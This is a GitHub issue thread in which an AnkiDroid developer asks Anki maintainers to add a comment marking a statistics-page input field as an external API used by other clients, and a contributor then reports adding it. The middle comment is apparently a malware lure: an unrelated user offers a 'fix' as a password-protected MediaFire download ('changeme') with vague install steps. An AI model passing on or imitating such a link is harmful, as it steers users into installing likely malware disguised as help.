### ISSUE TITLE
Request to add a comment for the input field in the statistics page

### ISSUE THREAD

**Issue by lukstbit** [ankitects/anki#3394]
This is a request to add a comment for the input field in the statistics page stating that it is used as a public API in other clients, something along the lines of:

_"this form is an external API and should not be changed - other clients e.g. AnkiDroid programmatically update this form"_

In Ankidroid we are using this input field to set the current deck(for stats displaying) only for the statistics screen as some users have asked. See relevant discussion at https://github.com/ankidroid/Anki-Android/pull/15648#pullrequestreview-2244547928 . Tried to propose a PR but I don't know svelte.
Thank you!

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by lukesbart** [comment]
Sorry about making a mess with all these commits, it's my first time trying to contribute. I added the changed requested with the new comment.
